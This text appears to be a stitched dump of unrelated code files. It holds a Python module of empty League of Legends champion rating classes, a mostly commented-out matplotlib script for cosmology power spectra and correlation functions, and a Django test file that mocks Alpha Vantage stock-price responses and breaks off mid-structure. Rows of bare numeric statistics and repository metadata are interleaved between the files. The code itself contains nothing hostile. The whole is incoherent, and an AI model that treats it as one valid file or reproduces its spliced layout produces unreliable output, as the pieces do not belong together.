class NA_RekSai_Bot_Alistar(Ratings):
pass
class NA_RekSai_Bot_Amumu(Ratings):
pass
class NA_RekSai_Bot_Anivia(Ratings):
pass
class NA_RekSai_Bot_Annie(Ratings):
pass
class NA_RekSai_Bot_Ashe(Ratings):
pass
class NA_RekSai_Bot_AurelionSol(Ratings):
pass
class NA_RekSai_Bot_Azir(Ratings):
pass
class NA_RekSai_Bot_Bard(Ratings):
pass
class NA_RekSai_Bot_Blitzcrank(Ratings):
pass
class NA_RekSai_Bot_Brand(Ratings):
pass
class NA_RekSai_Bot_Braum(Ratings):
pass
class NA_RekSai_Bot_Caitlyn(Ratings):
pass
class NA_RekSai_Bot_Camille(Ratings):
pass
class NA_RekSai_Bot_Cassiopeia(Ratings):
pass
class NA_RekSai_Bot_Chogath(Ratings):
pass
class NA_RekSai_Bot_Corki(Ratings):
pass
class NA_RekSai_Bot_Darius(Ratings):
pass
class NA_RekSai_Bot_Diana(Ratings):
pass
class NA_RekSai_Bot_Draven(Ratings):
pass
class NA_RekSai_Bot_DrMundo(Ratings):
pass
class NA_RekSai_Bot_Ekko(Ratings):
pass
class NA_RekSai_Bot_Elise(Ratings):
pass
class NA_RekSai_Bot_Evelynn(Ratings):
pass
class NA_RekSai_Bot_Ezreal(Ratings):
pass
class NA_RekSai_Bot_Fiddlesticks(Ratings):
pass
class NA_RekSai_Bot_Fiora(Ratings):
pass
class NA_RekSai_Bot_Fizz(Ratings):
pass
class NA_RekSai_Bot_Galio(Ratings):
pass
class NA_RekSai_Bot_Gangplank(Ratings):
pass
class NA_RekSai_Bot_Garen(Ratings):
pass
class NA_RekSai_Bot_Gnar(Ratings):
pass
class NA_RekSai_Bot_Gragas(Ratings):
pass
class NA_RekSai_Bot_Graves(Ratings):
pass
class NA_RekSai_Bot_Hecarim(Ratings):
pass
class NA_RekSai_Bot_Heimerdinger(Ratings):
pass
class NA_RekSai_Bot_Illaoi(Ratings):
pass
class NA_RekSai_Bot_Irelia(Ratings):
pass
class NA_RekSai_Bot_Ivern(Ratings):
pass
class NA_RekSai_Bot_Janna(Ratings):
pass
class NA_RekSai_Bot_JarvanIV(Ratings):
pass
class NA_RekSai_Bot_Jax(Ratings):
pass
class NA_RekSai_Bot_Jayce(Ratings):
pass
class NA_RekSai_Bot_Jhin(Ratings):
pass
class NA_RekSai_Bot_Jinx(Ratings):
pass
class NA_RekSai_Bot_Kalista(Ratings):
pass
class NA_RekSai_Bot_Karma(Ratings):
pass
class NA_RekSai_Bot_Karthus(Ratings):
pass
class NA_RekSai_Bot_Kassadin(Ratings):
pass
class NA_RekSai_Bot_Katarina(Ratings):
pass
class NA_RekSai_Bot_Kayle(Ratings):
pass
class NA_RekSai_Bot_Kayn(Ratings):
pass
class NA_RekSai_Bot_Kennen(Ratings):
pass
class NA_RekSai_Bot_Khazix(Ratings):
pass
class NA_RekSai_Bot_Kindred(Ratings):
pass
class NA_RekSai_Bot_Kled(Ratings):
pass
class NA_RekSai_Bot_KogMaw(Ratings):
pass
class NA_RekSai_Bot_Leblanc(Ratings):
pass
class NA_RekSai_Bot_LeeSin(Ratings):
pass
class NA_RekSai_Bot_Leona(Ratings):
pass
class NA_RekSai_Bot_Lissandra(Ratings):
pass
class NA_RekSai_Bot_Lucian(Ratings):
pass
class NA_RekSai_Bot_Lulu(Ratings):
pass
class NA_RekSai_Bot_Lux(Ratings):
pass
class NA_RekSai_Bot_Malphite(Ratings):
pass
class NA_RekSai_Bot_Malzahar(Ratings):
pass
class NA_RekSai_Bot_Maokai(Ratings):
pass
class NA_RekSai_Bot_MasterYi(Ratings):
pass
class NA_RekSai_Bot_MissFortune(Ratings):
pass
class NA_RekSai_Bot_MonkeyKing(Ratings):
pass
class NA_RekSai_Bot_Mordekaiser(Ratings):
pass
class NA_RekSai_Bot_Morgana(Ratings):
pass
class NA_RekSai_Bot_Nami(Ratings):
pass
class NA_RekSai_Bot_Nasus(Ratings):
pass
class NA_RekSai_Bot_Nautilus(Ratings):
pass
class NA_RekSai_Bot_Nidalee(Ratings):
pass
class NA_RekSai_Bot_Nocturne(Ratings):
pass
class NA_RekSai_Bot_Nunu(Ratings):
pass
class NA_RekSai_Bot_Olaf(Ratings):
pass
class NA_RekSai_Bot_Orianna(Ratings):
pass
class NA_RekSai_Bot_Ornn(Ratings):
pass
class NA_RekSai_Bot_Pantheon(Ratings):
pass
class NA_RekSai_Bot_Poppy(Ratings):
pass
class NA_RekSai_Bot_Quinn(Ratings):
pass
class NA_RekSai_Bot_Rakan(Ratings):
pass
class NA_RekSai_Bot_Rammus(Ratings):
pass
class NA_RekSai_Bot_RekSai(Ratings):
pass
class NA_RekSai_Bot_Renekton(Ratings):
pass
class NA_RekSai_Bot_Rengar(Ratings):
pass
class NA_RekSai_Bot_Riven(Ratings):
pass
class NA_RekSai_Bot_Rumble(Ratings):
pass
class NA_RekSai_Bot_Ryze(Ratings):
pass
class NA_RekSai_Bot_Sejuani(Ratings):
pass
class NA_RekSai_Bot_Shaco(Ratings):
pass
class NA_RekSai_Bot_Shen(Ratings):
pass
class NA_RekSai_Bot_Shyvana(Ratings):
pass
class NA_RekSai_Bot_Singed(Ratings):
pass
class NA_RekSai_Bot_Sion(Ratings):
pass
class NA_RekSai_Bot_Sivir(Ratings):
pass
class NA_RekSai_Bot_Skarner(Ratings):
pass
class NA_RekSai_Bot_Sona(Ratings):
pass
class NA_RekSai_Bot_Soraka(Ratings):
pass
class NA_RekSai_Bot_Swain(Ratings):
pass
class NA_RekSai_Bot_Syndra(Ratings):
pass
class NA_RekSai_Bot_TahmKench(Ratings):
pass
class NA_RekSai_Bot_Taliyah(Ratings):
pass
class NA_RekSai_Bot_Talon(Ratings):
pass
class NA_RekSai_Bot_Taric(Ratings):
pass
class NA_RekSai_Bot_Teemo(Ratings):
pass
class NA_RekSai_Bot_Thresh(Ratings):
pass
class NA_RekSai_Bot_Tristana(Ratings):
pass
class NA_RekSai_Bot_Trundle(Ratings):
pass
class NA_RekSai_Bot_Tryndamere(Ratings):
pass
class NA_RekSai_Bot_TwistedFate(Ratings):
pass
class NA_RekSai_Bot_Twitch(Ratings):
pass
class NA_RekSai_Bot_Udyr(Ratings):
pass
class NA_RekSai_Bot_Urgot(Ratings):
pass
class NA_RekSai_Bot_Varus(Ratings):
pass
class NA_RekSai_Bot_Vayne(Ratings):
pass
class NA_RekSai_Bot_Veigar(Ratings):
pass
class NA_RekSai_Bot_Velkoz(Ratings):
pass
class NA_RekSai_Bot_Vi(Ratings):
pass
class NA_RekSai_Bot_Viktor(Ratings):
pass
class NA_RekSai_Bot_Vladimir(Ratings):
pass
class NA_RekSai_Bot_Volibear(Ratings):
pass
class NA_RekSai_Bot_Warwick(Ratings):
pass
class NA_RekSai_Bot_Xayah(Ratings):
pass
class NA_RekSai_Bot_Xerath(Ratings):
pass
class NA_RekSai_Bot_XinZhao(Ratings):
pass
class NA_RekSai_Bot_Yasuo(Ratings):
pass
class NA_RekSai_Bot_Yorick(Ratings):
pass
class NA_RekSai_Bot_Zac(Ratings):
pass
class NA_RekSai_Bot_Zed(Ratings):
pass
class NA_RekSai_Bot_Ziggs(Ratings):
pass
class NA_RekSai_Bot_Zilean(Ratings):
pass
class NA_RekSai_Bot_Zyra(Ratings):
pass
| 15.695444
| 46
| 0.766692
| 972
| 6,545
| 4.736626
| 0.151235
| 0.209818
| 0.389661
| 0.479583
| 0.803432
| 0.803432
| 0
| 0
| 0
| 0
| 0
| 0
| 0.169748
| 6,545
| 416
| 47
| 15.733173
| 0.847258
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
de2cb22c06be951b4fdc7384a94a639d5b1f883c
| 10,847
|
py
|
Python
|
struct/model/boss/2pcf_pk_test/plot_test.py
|
naonori/hitomi
|
02b188eb8ada4d39a10801bf3193581b9bc9c310
|
[
"MIT"
] | 6
|
2021-09-28T04:00:56.000Z
|
2022-03-23T03:49:19.000Z
|
struct/model/boss/2pcf_pk_test/plot_test.py
|
naonori/hitomi
|
02b188eb8ada4d39a10801bf3193581b9bc9c310
|
[
"MIT"
] | null | null | null |
struct/model/boss/2pcf_pk_test/plot_test.py
|
naonori/hitomi
|
02b188eb8ada4d39a10801bf3193581b9bc9c310
|
[
"MIT"
] | null | null | null |
########################
# Purpose of this code #
########################
#
# This code aims to plot the computed power spectra and 2PCFs.
#
######################################################
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os
import numpy as np
import matplotlib.pyplot as plt
params = {
# 'font.family': 'Times New Roman',
# 'text.usetex': 'True',
'font.size': 11.0,
}
plt.rcParams.update(params)
#fig = plt.figure(figsize=(210.0/25.4, 264.0/25.4/2.3))
#fig = plt.figure(figsize=(1.8*210.0/25.4, 1.8*210.0/25.4/3.0))
fig = plt.figure(figsize=(7.0,7.0))
ax = []
##--------------------------
total_h = 0.94
total_w = 0.99
dw = 0.07
dh = 0.00
left = 0.13
bottom = 0.11
height = (total_h - (bottom + dh))
width = (total_w - (left + dw))
#left bottom, width, height
rect1 = [left, bottom, width, height]
ax.append(fig.add_axes(rect1))
### ##########
### ## Linear power spectra
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### k, pk = np.loadtxt("results_test/pk%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="royalblue", label="pk%d" % ELL)
### ax[0].set_xlim(0.01, 0.2)
### ax[0].set_xlabel("k [h/Mpc]")
### ax[0].set_ylabel(r"$k^{1.5}$ power spectrum(k)")
### ax[0].legend(loc=0)
### plt.savefig("figure/pk%d_Tree.png" % ELL)
### os.system("display figure/pk%d_Tree.png" % ELL)
###
### ##########
### ## Linear 2PCFs
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### r, xi = np.loadtxt("results_test/xi%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="royalblue", label="xi%d" % ELL)
### ax[0].set_xlim(40, 150)
### ax[0].set_xlabel("r [Mpc/h]")
### ax[0].set_ylabel(r"$r^2$ 2PCF(r)")
### ax[0].legend(loc=0)
### plt.savefig("figure/xi%d_Tree.png" % ELL)
### os.system("display figure/xi%d_Tree.png" % ELL)
###
###
### ##########
### ## Linear no-wiggle power spectra
### ###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### k, pk = np.loadtxt("results_test/pk%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="royalblue", label="pk%d: wiggle" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="forestgreen", label="pk%d: no-wiggle" % ELL)
### ax[0].set_xlim(0.01, 0.2)
### ax[0].set_xlabel("k [h/Mpc]")
### ax[0].set_ylabel(r"$k^{1.5}$ power spectrum(k)")
### ax[0].legend(loc=0)
### plt.savefig("figure/pk%d_Tree_NoWiggle.png" % ELL)
### os.system("display figure/pk%d_Tree_NoWiggle.png" % ELL)
###
### ##########
### ## Linear no-wiggle 2PCFs
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### r, xi = np.loadtxt("results_test/xi%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="royalblue", label="xi%d: wiggle" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="forestgreen", label="xi%d: no-wiggle" % ELL)
### ax[0].set_xlim(40, 150)
### ax[0].set_xlabel("r [Mpc/h]")
### ax[0].set_ylabel(r"$r^2$ 2PCF(r)")
### ax[0].legend(loc=0)
### plt.savefig("figure/xi%d_Tree_NoWiggle.png" % ELL)
### os.system("display figure/xi%d_Tree_NoWiggle.png" % ELL)
###
###
### ##########
### ## Linear power spectra with non-linear BAO
### ###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### k, pk = np.loadtxt("results_test/pk%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="royalblue", label="pk%d: wiggle" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="forestgreen", label="pk%d: no-wiggle" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="magenta", label="pk%d: NL BAO" % ELL)
### ax[0].set_xlim(0.01, 0.2)
### ax[0].set_xlabel("k [h/Mpc]")
### ax[0].set_ylabel(r"$k^{1.5}$ power spectrum(k)")
### ax[0].legend(loc=0)
### plt.savefig("figure/pk%d_Tree_BAO.png" % ELL)
### os.system("display figure/pk%d_Tree_BAO.png" % ELL)
###
### ##########
### ## Linear 2PCFs with non-linear BAO
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### r, xi = np.loadtxt("results_test/xi%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="royalblue", label="xi%d: wiggle" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="forestgreen", label="xi%d: no-wiggle" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="magenta", label="xi%d: NL BAO" % ELL)
### ax[0].set_xlim(40, 150)
### ax[0].set_xlabel("r [Mpc/h]")
### ax[0].set_ylabel(r"$r^2$ 2PCF(r)")
### ax[0].legend(loc=0)
### plt.savefig("figure/xi%d_Tree_BAO.png" % ELL)
### os.system("display figure/xi%d_Tree_BAO.png" % ELL)
###
###
###
###
### ##########
### ## Linear power spectra with reconstructed non-linear BAO
### ###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### k, pk = np.loadtxt("results_test/pk%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="royalblue", label="pk%d: wiggle" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="forestgreen", label="pk%d: no-wiggle" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="magenta", label="pk%d: NL BAO" % ELL)
###
### for R in [5, 10, 15, 20]:
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_recon_R%02d_fft.dat" % (ELL, R), usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", label="pk%d: R = %02d" % (ELL, R))
###
### ax[0].set_xlim(0.01, 0.2)
### ax[0].set_xlabel("k [h/Mpc]")
### ax[0].set_ylabel(r"$k^{1.5}$ power spectrum(k)")
### ax[0].legend(loc=0)
### plt.savefig("figure/pk%d_Tree_BAO_recon.png" % ELL)
### os.system("display figure/pk%d_Tree_BAO_recon.png" % ELL)
###
### ##########
### ## Linear 2PCFs with reconstructed non-linear BAO
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### r, xi = np.loadtxt("results_test/xi%d_Tree_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="royalblue", label="xi%d: wiggle" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_NoWiggle_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="forestgreen", label="xi%d: no-wiggle" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="magenta", label="xi%d: NL BAO" % ELL)
###
### for R in [5, 10, 15, 20]:
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_recon_R%02d_fft.dat" % (ELL, R), usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", label="xi%d: R = %02d" % (ELL, R))
###
### ax[0].set_xlim(40, 150)
### ax[0].set_xlabel("r [Mpc/h]")
### ax[0].set_ylabel(r"$r^2$ 2PCF(r)")
### ax[0].legend(loc=0)
### plt.savefig("figure/xi%d_Tree_BAO_recon.png" % ELL)
### os.system("display figure/xi%d_Tree_BAO_recon.png" % ELL)
###
###
### ##########
### ## Linear power spectra with non-linear BAO, decomposed by parameters.
### ###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", color="magenta", label="pk%d: total" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_Template_b1_b1_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", label="pk%d: b1_b1" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_Template_b1_f_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", label="pk%d: b1_f" % ELL)
### k, pk = np.loadtxt("results_test/pk%d_Tree_BAO_Template_f_f_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(k, k**1.5*pk, "-", label="pk%d: f_f" % ELL)
### ax[0].set_xlim(0.01, 0.2)
### ax[0].set_xlabel("k [h/Mpc]")
### ax[0].set_ylabel(r"$k^{1.5}$ power spectrum(k)")
### ax[0].legend(loc=0)
### plt.savefig("figure/pk%d_Tree_BAO_decon.png" % ELL)
### os.system("display figure/pk%d_Tree_BAO_decon.png" % ELL)
###
### ##########
### ## Linear 2PCFs with non-linear BAO, decomposed by parameters.
###
### for ELL in [0,2,4]:
###
### fig = plt.figure(figsize=(7.0,7.0))
### ax = []
### ax.append(fig.add_axes(rect1))
###
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", color="magenta", label="xi%d: total" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_Template_b1_b1_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", label="xi%d: b1_b1" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_Template_b1_f_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", label="xi%d: b1_f" % ELL)
### r, xi = np.loadtxt("results_test/xi%d_Tree_BAO_Template_f_f_fft.dat" % ELL, usecols=(0,1), unpack=True)
### ax[0].plot(r, r**2*xi, "-", label="xi%d: f_f" % ELL)
### ax[0].set_xlim(40, 150)
### ax[0].set_xlabel("r [Mpc/h]")
### ax[0].set_ylabel(r"$r^2$ 2PCF(r)")
### ax[0].legend(loc=0)
### plt.savefig("figure/xi%d_Tree_BAO_decon.png" % ELL)
### os.system("display figure/xi%d_Tree_BAO_decon.png" % ELL)
### #
###
| 39.878676
| 119
| 0.548815
| 1,836
| 10,847
| 3.122004
| 0.071895
| 0.03559
| 0.031403
| 0.097697
| 0.925506
| 0.919749
| 0.906315
| 0.900384
| 0.888172
| 0.846127
| 0
| 0.047593
| 0.167051
| 10,847
| 271
| 120
| 40.02583
| 0.586829
| 0.85443
| 0
| 0
| 0
| 0
| 0.014085
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.157895
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
de3fda95d161613919b336bc254597d4c050044e
| 54
|
py
|
Python
|
stRT/plot/__init__.py
|
Yao-14/stAnalysis
|
d08483ce581f5b03cfcad8be500aaa64b0293f74
|
[
"BSD-3-Clause"
] | null | null | null |
stRT/plot/__init__.py
|
Yao-14/stAnalysis
|
d08483ce581f5b03cfcad8be500aaa64b0293f74
|
[
"BSD-3-Clause"
] | null | null | null |
stRT/plot/__init__.py
|
Yao-14/stAnalysis
|
d08483ce581f5b03cfcad8be500aaa64b0293f74
|
[
"BSD-3-Clause"
] | null | null | null |
from .three_d_plot import *
from .two_d_plot import *
| 18
| 27
| 0.777778
| 10
| 54
| 3.8
| 0.6
| 0.263158
| 0.578947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 54
| 2
| 28
| 27
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
de40a673cf2d9517d36be6de4ef1d9ecc1f5744c
| 30,260
|
py
|
Python
|
data_block/one/tests/test_block.py
|
spectrum-dev/django-block-monolith
|
c17a1ef98ae813a4e94581e2e52a4a03f0e65769
|
[
"MIT"
] | null | null | null |
data_block/one/tests/test_block.py
|
spectrum-dev/django-block-monolith
|
c17a1ef98ae813a4e94581e2e52a4a03f0e65769
|
[
"MIT"
] | null | null | null |
data_block/one/tests/test_block.py
|
spectrum-dev/django-block-monolith
|
c17a1ef98ae813a4e94581e2e52a4a03f0e65769
|
[
"MIT"
] | null | null | null |
import responses
from django.test import TestCase
from blocks.event import event_ingestor
from data_block.one.exceptions import (
DataBlockOneInvalidCandlestickException,
DataBlockOneInvalidInputPayloadException,
)
class GetEquityName(TestCase):
@responses.activate
def test_ok(self):
ticker_name = "BA"
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords={ticker_name}&apikey=demo&datatype=json",
json={
"bestMatches": [
{
"1. symbol": "BA",
"2. name": "Boeing Company",
"3. type": "Equity",
"4. region": "United States",
"5. marketOpen": "09:30",
"6. marketClose": "16:00",
"7. timezone": "UTC-04",
"8. currency": "USD",
"9. matchScore": "1.0000",
},
{
"1. symbol": "BAB",
"2. name": "Invesco Taxable Municipal Bond ETF",
"3. type": "ETF",
"4. region": "United States",
"5. marketOpen": "09:30",
"6. marketClose": "16:00",
"7. timezone": "UTC-04",
"8. currency": "USD",
"9. matchScore": "0.8000",
},
],
},
status=200,
)
response = self.client.get(f"/DATA_BLOCK/1/equityName?name={ticker_name}")
self.assertDictEqual(response.json(), {"response": ["BA", "BAB"]})
@responses.activate
def test_empty_input(self):
ticker_name = ""
response = self.client.get(f"/DATA_BLOCK/1/equityName?name={ticker_name}")
self.assertDictEqual(response.json(), {"response": []})
@responses.activate
def test_not_found(self):
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=SYMBOL_SEARCH&keywords=Ticker%20Name%20DNE&apikey=demo&datatype=json",
json={
"bestMatches": [],
},
status=200,
)
response = self.client.get(f"/DATA_BLOCK/1/equityName?name=Ticker Name DNE")
self.assertDictEqual(response.json(), {"response": []})
# TODO: It seems like there is no API limit
def test_error_api_key_limit(self):
pass
class PostRun(TestCase):
def setUp(self):
self.payload = {
"blockType": "DATA_BLOCK",
"blockId": 1,
}
@responses.activate
def test_get_intraday_1min_data_ok(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "AAPL",
"candlestick": "1min",
"start_date": "2021-06-21 19:58:00",
"end_date": "2021-06-21 20:00:00",
},
"outputs": {},
}
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=AAPL&interval=1min&outputsize=full&apikey=demo&datatype=json",
json={
"Meta Data": {
"1. Information": "Intraday (1min) open, high, low, close prices and volume",
"2. Symbol": "AAPL",
"3. Last Refreshed": "2021-06-21 20:00:00",
"4. Interval": "1min",
"5. Output Size": "Full size",
"6. Time Zone": "US/Eastern",
},
"Time Series (1min)": {
"2021-06-21 20:00:00": {
"1. open": "132.3800",
"2. high": "132.4500",
"3. low": "132.3800",
"4. close": "132.4500",
"5. volume": "7165",
},
"2021-06-21 19:59:00": {
"1. open": "132.3900",
"2. high": "132.4100",
"3. low": "132.3800",
"4. close": "132.4100",
"5. volume": "1212",
},
"2021-06-21 19:58:00": {
"1. open": "132.4000",
"2. high": "132.4100",
"3. low": "132.4000",
"4. close": "132.4100",
"5. volume": "1485",
},
},
},
status=200,
)
response = event_ingestor(payload)
self.assertDictEqual(
response,
{
"response": [
{
"open": 132.4,
"high": 132.41,
"low": 132.4,
"close": 132.41,
"volume": 1485.0,
"timestamp": "2021-06-21T19:58:00.000000000",
},
{
"open": 132.39,
"high": 132.41,
"low": 132.38,
"close": 132.41,
"volume": 1212.0,
"timestamp": "2021-06-21T19:59:00.000000000",
},
{
"open": 132.38,
"high": 132.45,
"low": 132.38,
"close": 132.45,
"volume": 7165.0,
"timestamp": "2021-06-21T20:00:00.000000000",
},
]
},
)
@responses.activate
def test_get_intraday_5min_data_ok(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "AAPL",
"candlestick": "5min",
"start_date": "2021-06-21 19:50:00",
"end_date": "2021-06-21 20:00:00",
},
"outputs": {},
}
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=AAPL&interval=5min&outputsize=full&apikey=demo&datatype=json",
json={
"Meta Data": {
"1. Information": "Intraday (5min) open, high, low, close prices and volume",
"2. Symbol": "AAPL",
"3. Last Refreshed": "2021-06-21 20:00:00",
"4. Interval": "5min",
"5. Output Size": "Full size",
"6. Time Zone": "US/Eastern",
},
"Time Series (5min)": {
"2021-06-21 20:00:00": {
"1. open": "132.3800",
"2. high": "132.4500",
"3. low": "132.3800",
"4. close": "132.4500",
"5. volume": "7165",
},
"2021-06-21 19:55:00": {
"1. open": "132.3900",
"2. high": "132.4100",
"3. low": "132.3800",
"4. close": "132.4100",
"5. volume": "1212",
},
"2021-06-21 19:50:00": {
"1. open": "132.4000",
"2. high": "132.4100",
"3. low": "132.4000",
"4. close": "132.4100",
"5. volume": "1485",
},
},
},
status=200,
)
response = event_ingestor(payload)
self.assertDictEqual(
response,
{
"response": [
{
"open": 132.4,
"high": 132.41,
"low": 132.4,
"close": 132.41,
"volume": 1485.0,
"timestamp": "2021-06-21T19:50:00.000000000",
},
{
"open": 132.39,
"high": 132.41,
"low": 132.38,
"close": 132.41,
"volume": 1212.0,
"timestamp": "2021-06-21T19:55:00.000000000",
},
{
"open": 132.38,
"high": 132.45,
"low": 132.38,
"close": 132.45,
"volume": 7165.0,
"timestamp": "2021-06-21T20:00:00.000000000",
},
]
},
)
@responses.activate
def test_get_intraday_15min_data_ok(self):
payload = {
**self.payload,
"inputs": {
"equity_name": "AAPL",
"candlestick": "15min",
"start_date": "2021-06-21 19:30:00",
"end_date": "2021-06-21 20:00:00",
},
"outputs": {},
}
responses.add(
responses.GET,
f"https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=AAPL&interval=15min&outputsize=full&apikey=demo&datatype=json",
json={
"Meta Data": {
"1. Information": "Intraday (15min) open, high, low, close prices and volume",
"2. Symbol": "AAPL",
"3. Last Refreshed": "2021-06-21 20:00:00",
"4. Interval": "15min",
"5. Output Size": "Full size",
"6. Time Zone": "US/Eastern",
},
"Time Series (15min)": {
"2021-06-21 20:00:00": {
"1. open": "132.3800",
"2. high": "132.4500",
"3. low": "132.3800",
"4. close": "132.4500",
"5. volume": "7165",
},
"2021-06-21 19:45:00": {
"1. open": "132.3900",
"2. high": "132.4100",
"3. low": "132.3800",
"4. close": "132.4100",
"5. volume": "1212",
},
"2021-06-21 19:30:00": {
"1. open": "132.4000",
"2. high": "132.4100",
"3. low": "132.4000",
"4. close": "132.4100",
"5. volume": "1485",
},
},
},
status=200,
)
response = event_ingestor(payload)
self.assertDictEqual(
response,
{
"response": [
{
"open": 132.4,
"high": 132.41,
"low": 132.4,
